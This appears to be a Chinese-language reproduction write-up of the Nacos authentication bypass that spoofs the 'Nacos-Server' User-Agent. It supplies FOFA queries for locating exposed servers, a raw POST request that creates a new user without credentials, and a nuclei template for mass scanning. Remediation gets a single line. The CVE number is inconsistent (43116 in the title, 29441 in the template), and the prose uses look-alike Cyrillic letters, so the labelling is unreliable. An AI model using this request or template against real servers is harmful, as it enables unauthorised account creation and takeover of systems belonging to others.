Nacos 身份认证绕过漏洞(CVE-2021-43116)漏洞复现
1、漏洞简介
Nасоѕ是一个专为动态服务发现和配置以及服务管理而设计的平台。在 Nасоѕ 1.4.1 之前的版本中,当配置为使用身份验证(-Dnасоѕ.соrе.аuth.еnаblеd=truе)时,Nасоѕ 使用 AuthFiltеr ѕеrvlеt 过滤器强制执行身份验证。该过滤器有一个后门,使 Nасоѕ 服务器能够绕过该过滤器,从而跳过身份验证检查。此机制依赖于用户代理 HTTP 标头,因此很容易被欺骗。此漏洞可能允许任何用户在 Nасоѕ 服务器上执行任何管理任务。
2、资产指纹
fofa:port=“8848”
app=“NACOS”
3、漏洞复现
POST /nacos/v1/auth/users/?username=sectest05&password=20240520 HTTP/1.1
Host:
User-Agent: Nacos-Server
Connection: close
Accept-Encoding: gzip, deflate
Content-Length: 0
访问http://ip/nacos/#/login使用新增的账号密码进行登录
4、nuclei脚本
id: nacosCVE-2021-29441
info:
name: nacos 身份认证绕过
author: xxx
severity: high
description: nacos 身份认证绕过漏洞,可任意新增用户。
tags: nacos 身份认证绕过漏洞,可任意新增用户。
http:
- raw:
- |
POST /nacos/v1/auth/users/?username=sectest0520&password=20240520 HTTP/1.1
Host: {{Hostname}}
User-Agent: Nacos-Server
Content-Length: 0
Accept-Encoding: gzip
matchers:
- type: dsl
name: nacos 身份认证绕过
dsl:
- "contains(body,'create user ok!') || contains(body,'already exist')"
修复方式
更新到2.2.3版本以上